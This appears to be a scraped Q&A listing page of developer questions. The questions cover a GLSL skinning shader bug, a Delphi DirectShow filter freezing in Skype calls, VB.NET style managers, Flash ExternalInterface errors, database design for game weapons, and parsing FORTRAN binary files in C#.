i++) { skinnedNormal += jointsWeights[i] * skinningPalette[int(jointsIndices[i])] * vec4(normal, 0.); } vec4 finalPosition = mix(position, skinnedVertexPosition, skinningEnabled); vec4 finalNormal = mix(vec4(normal, 0.), skinnedNormal, skinningEnabled); vec3 eyeNormal = normalize(normalMatrix * finalNormal.xyz); vec3 lightPosition = vec3(0., 0., 2.); lIntensity = max(0.0, dot(eyeNormal, normalize(lightPosition))); gl_Position = projectionMatrix * modelMatrix * finalPosition; } The result is that the animation displays wrong in terms of orientation. That is, instead of bobbing up and down it bobs in and out (along what I think is the Z axis according to my transform in the export clip). And the rotation angle is counterclockwise instead of clockwise. If I try with a more than one joint, then it's almost as if the second joint rotates in it's own different coordinate space and does not follow 100% its parent's transform. Which I assume it should from my animation subsystem which I assume in turn follows the theory I explained for the case of more than one joint. Any thoughts?

    Read the article

  • DirectShow Filter I wrote dies after 10-24 seconds in Skype video call

    - by Robert Oschler
    I've written a DirectShow push filter for use with Skype using Delphi Pro 6 and the DSPACK DirectShow library. In preview mode, when you test a video input device in the Skype client Video Settings window, my filter works flawlessly. I can leave it up and running for many minutes without an error. However when I start a video call after 10 to 24 seconds, never longer, the video feed freezes. The call continues fine with the call duration counter clicking away the seconds, but the video feed is dead, stuck on whatever frame the freeze happened (although after a long while it turns black which I believe means Skype has given up on the filter). I tried attaching to the process from my debugger with a breakpoint literally set on every method call and none of them are hit once the freeze takes place. It's as if the thread that makes the DirectShow FillBuffer() call to my filter on behalf of Skype is dead or has been shutdown. I can't trace my filter in the debugger because during a Skype call I get weird int 1 and int 3 debugger hard interrupt calls when a Skype video call is in progress. This behavior happens even with my standard web cam input device selected and my DirectShow filter completely unregistered as a ActiveX server. I suspect it might be some "anti-debugging" code since it doesn't happen in video input preview mode. Either way, that is why I had to attach to the process after the fact to see if my FillBuffer() called was still being called and instead discovered that appears to be dead. Note, my plain vanilla USB web cam's DirectShow filter does not exhibit the freezing behavior and works fine for many minutes. There's something about my filter that Skype doesn't like. I've tried Sleep() statements of varying intervals, no Sleep statements, doing virtually nothing in the FillBuffer() call. Nothing helps. If anyone has any ideas on what might be the culprit here, I'd like to know. Thanks, Robert

    Read the article

  • VB.NET, templates, reflection, inheritance, feeling adrift

    - by brovar
    I've just made myself up a problem and am now wondering how to solve it. To begin with, I'm using some third-party components, including some calendar controls like schedule and timeline. They're used in the project classes more or less like that: Friend Class TimeBasedDataView 'some members End Class Friend Class ScheduleDataView Inherits TimeBasedDataView Public Schedule As Controls.Schedule.Schedule 'and others End Class Friend Class TimeLineDataView Inherits TimeBasedDataView Public TimeLine As Controls.TimeLine.TimeLine 'and others End Class (Hmm, code coloring fail, never mind...) Now, to allow managing the look of data being presented there are some mechanisms including so called Style Managers. A lot of code in them repeats, varying almost only with the control it maintains: Friend Class TimeLineStyleManager Private m_TimeLine As TimeLineDataView Private Sub Whatever() m_TimeLine.TimeLine.SomeProperty = SomeValue End Sub End Class Friend Class ScheduleStyleManager Private m_Schedule As ScheduleDataView Private Sub Whatever() m_Schedule.Schedule.SomeProperty = SomeValue End Sub End Class I was wondering if I could create some base class for those managers, like Friend Class TimeBasedCtrlStyleManagerBase(Of T As TimeBasedDataView) Private m_Control As T 'and others End Class which would unify these two, but I've got lost when it came to maintaining two components that have nothing in common (except their properties' names, etc.). Type reflection maybe? I'll be grateful for any advice ;)

    Read the article

  • ExternalInterface

    - by Jesse
    Hey, so I'm having a bunch of trouble getting ExternalInterface to work, which is odd, because I use it somewhat often. I'm hoping it's something I just missed because I've been looking at it too long. The flash_ready function is correctly returning the objectID, and as far as I can tell, everything else is in order. Unfortunately, when I run it, I get an error (varying by browser) telling me that basically document.getElementById(<movename>).test() is not a valid method. Here's the code: javascript: function flash_ready(i){ document.getElementById(i).test('success!'); } Embed Html (Generated): <script type="text/javascript"> swfobject.embedSWF("/chainmaille/includes/media/flash/upload_image.swf", "/chainmaille/includes/media/flash/upload_image", "500", "50", "9.0.0","expressInstall.swf", {}, {allowScriptAccess:'always', wmode:'transparent'},{id:'uploader_flash',name:'uploader_flash'}); </script> <object type="application/x-shockwave-flash" id="uploader_flash" name="uploader_flash" data="/chainmaille/includes/media/flash/upload_image.swf" width="500" height="50"><param name="allowScriptAccess" value="always"><param name="wmode" value="transparent"></object> AS3 : package com.jesseditson.uploader { import flash.display.MovieClip; import flash.external.ExternalInterface; import flash.system.Security; public class UI extends MovieClip { // Initialization: public function UI() { Security.allowDomain('*'); ExternalInterface.addCallback("test", test); var jscommand:String = "flash_ready('"+ExternalInterface.objectID+"');"; var url:URLRequest = new URLRequest("javascript:" + jscommand + " void(0);"); navigateToURL(url, "_self"); } public function test(t){ trace(t); } } } Swfobject is being included via google code, and the flash embeds just fine, so that's not the problem. I've got a very similar setup working on another server, but can't seem to get it working on this one. It's a Hostgator shared server. Could it be the server's fault? Anybody see any obvious syntax problems? Thanks in advance!

    Read the article

  • how to 'scale' these three tables?

    - by iddqd
    I have the following Tables: Players id playerName Weapons id type otherData Weapons2Player id playersID_reference weaponsID_reference That was nice and simple. Now I need to SELECT items from the Weapons table, according to some of their characteristics that i previously just packed into the otherData column (since it was only needed on the client side). The problem is, that the types have varying characteristics - but also a lot of similar data. So I'm trying to decide on the following possibilities, all of which have their pros and cons. Solution A Kill the Weapons table, and create a new table for each Weapon-Type: Weapons_Swords id bladeType damage otherData Weapons_Guns id accuracy damage ammoType otherData But how will i Link these to the Players ? create Weapons_Swords2Players, Weapons_Guns2Players for each weapon-type? (Will result in a lot more JOINS when loading the player with all his weapons...and it's also more complicated to insert a new player) or add another column to Weapons2Players called WeaponsTypeTable, then do sub-selects to the correct Weapons sub-table (seems easier, but not really right, slightly easier insert i guess) Solution B Keep the Weapons table, and add all the fields i need to it. The Problem is that then there will be NULL fields, since not all Weapon-Types use all fields (can't be right) Weapons id type accuracy damage ammoType bladeType otherData This seems to be pretty basic stuff, but i just can't decide what's best. Or is there a correct Solution C? many thanks.

    Read the article

  • C# - parse content away from structure in a binary file

    - by Jeff Godfrey
    Using C#, I need to read a packed binary file created using FORTRAN. The file is stored in an "Unformatted Sequential" format as described here (about half-way down the page in the "Unformatted Sequential Files" section): http://www.tacc.utexas.edu/services/userguides/intel8/fc/f_ug1/pggfmsp.htm As you can see from the URL, the file is organized into "chunks" of 130 bytes or less and includes 2 length bytes (inserted by the FORTRAN compiler) surrounding each chunk. So, I need to find an efficient way to parse the actual file payload away from the compiler-inserted formatting. Once I've extracted the actual payload from the file, I'll then need to parse it up into its varying data types. That'll be the next exercise. My first thoughts are to slurp up the entire file into a byte array using File.ReadAllBytes. Then, just iterate through the bytes, skipping the formatting and transferring the actual data to a second byte array. In the end, that second byte array should contain the actual file contents minus all the formatting, which I'd then need to go back through to get what I need. As I'm fairly new to C#, I thought there might be a better, more accepted way of tackling this. Also, in case it's helpful, these files could be fairly large (say 30MB), though most will be much smaller...

    Read the article

< Previous Page | 12 13 14 15 16 17 18 19 20 21 22 23  | Next Page >